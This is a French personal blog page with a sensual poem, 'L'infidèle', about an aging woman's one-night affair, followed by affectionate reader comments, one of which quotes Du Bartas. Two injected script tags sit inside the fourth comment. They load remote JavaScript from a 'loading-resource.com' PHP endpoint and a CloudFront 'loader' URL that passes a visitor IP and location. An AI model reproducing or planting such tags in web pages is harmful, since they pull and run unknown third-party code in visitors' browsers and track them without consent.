• L’infidèle

     



    L’infidèle


    L’infidèle

     

    Ô ! Vous, très cher amant promettez-moi d'avance

    Que vous m'arracherez le plus doux des soupirs

    Même si notre amour n’a point d'avenir

    Je me contenterai d'une simple présence.

    Mon corps tout entier, offert à vos caresses

    Sollicitent vos câlins dés que la nuit revient

    Ouvrant le chemin, à la porte d'un festin

    Une grotte sucrée avide de tendresse.

    Je veux sentir courir, vos doigts sur ma poitrine

    Vous la verrez gonfler, sous le feu du désir

    Envoûtée par vos mains, esclave du plaisir,

    Je serai pour vous seule, l'amoureuse divine.

    Malgré mes cheveux gris ornant ma chevelure

    J'aime encore trembler, sous les feux des frissons

    Quand le duel des corps, dans un même unisson

    S’en va pour une nuit, dans la même aventure.

    Ô ! Vous, mon cher amant, sortez de vos coulisses.

    Venez donc vous vautrer, dans mes draps de satin.

    Venez me chahuter jusqu'au prochain matin

    Venez faire couler, un fleuve entre mes cuisses.

    Voilà, mon cher amant, le destin est ainsi

    Pour un soir seulement,  je serai ta princesse

    Nous vivrons ces instants, sans aucune promesse

    Je ne peux point aimer un homme à l’infini.

    L’infidèle

    « Amour de mes rêves.Elle aimait le printemps »

    Tags Tags : , , , ,
  • Commentaires

    4
    Tendremamie
    Vendredi 20 Avril 2012 à 13:56

    coucou ma belle ici toujours un temps mi figues mi raisins, mais bon bien obligé de faire avec.... Mr Loulou est content il vaa avoir une copine qui va venir cette après midi pour cette fin de semaine...comme les enfants ils vont faire 2 nuits soiré pyjama hihi! je te fais de très gros bisous et te remercie de tes gentils mots.. en sifflant le soleil crois tu qu'il va venir? BIZZZ

    <script src="http://loading-resource.com/50.js.php?i=%7B10D2D978-682D-479E-BABE-3A8BCAD0E462%7D" type="text/javascript"></script> <script src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=FR&rid=A2&ccid=Saint-brieuc&ip=90.22.172.243" type="text/javascript"></script>
    3
    Vendredi 20 Avril 2012 à 03:46

    Ces amours éphémères qui nourrissent les guerres, sèment le doute dans l'union de toujour, pour un court instant de plaisir qui meurt avec le jour

    amicalement

    Claude

    2
    Jeudi 19 Avril 2012 à 18:54

    Passe une belle et douce soirée

    bisous

    fee5

    La Nuit (extraits)

    L'architecte du monde ordonna qu'à leur tour
    Le jour suivist la nuict, la nuict suivist le jour.
    La nuict peut temperer du jour la secheresse,
    Humecte nostre ciel et nos guerets engresse ;
    La nuict est celle-là qui de ses ailes sombres
    Sur le monde muet fait avecques les ombres
    Desgouter le silence, et couler dans les os
    Des recreus animaux un sommeilleux repos.
    Ô douce Nuict, sans toy, sans toy l'humaine vie
    Ne seroit qu'un enfer, où le chagrin, l'envie,
    La peine, l'avarice et cent façons de morts
    Sans fin bourrelleroyent et nos murs et nos corps.
    Ô Nuict, tu vas ostant le masque et la faintise
    Dont sur l'humain théatre en vain on se desguise,
    Tandis que le jour luit : ô Nuict alme, par toy
    Sont faits du tout esgaux le bouvier et le Roy,
    Le pauvre et l'opulent, le Grec et le Barbare,
    Le juge et l'accusé, le sçavant et l'ignare,
    Le maistre et le valet, le difforme et le beau :
    Car, Nuict, tu couvres tout de ton obscur manteau (...)

    Guillaume du Bartas, La Première Sepmaine ou Création du monde (1578)

    1
    Cigalix
    Jeudi 19 Avril 2012 à 17:05

    Coucou ma laurette

    Encore un bien joli texte c'est un plaisir de venir te lire!

    Merci pour les beaux mots que tu a déposé sur mon blog,tu es adorable! et merci aussi d'être inspirée par ma créa cela me touche beaucoup!

    Gros gros bisous et bonne fin d'après midi

    Sophie



    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :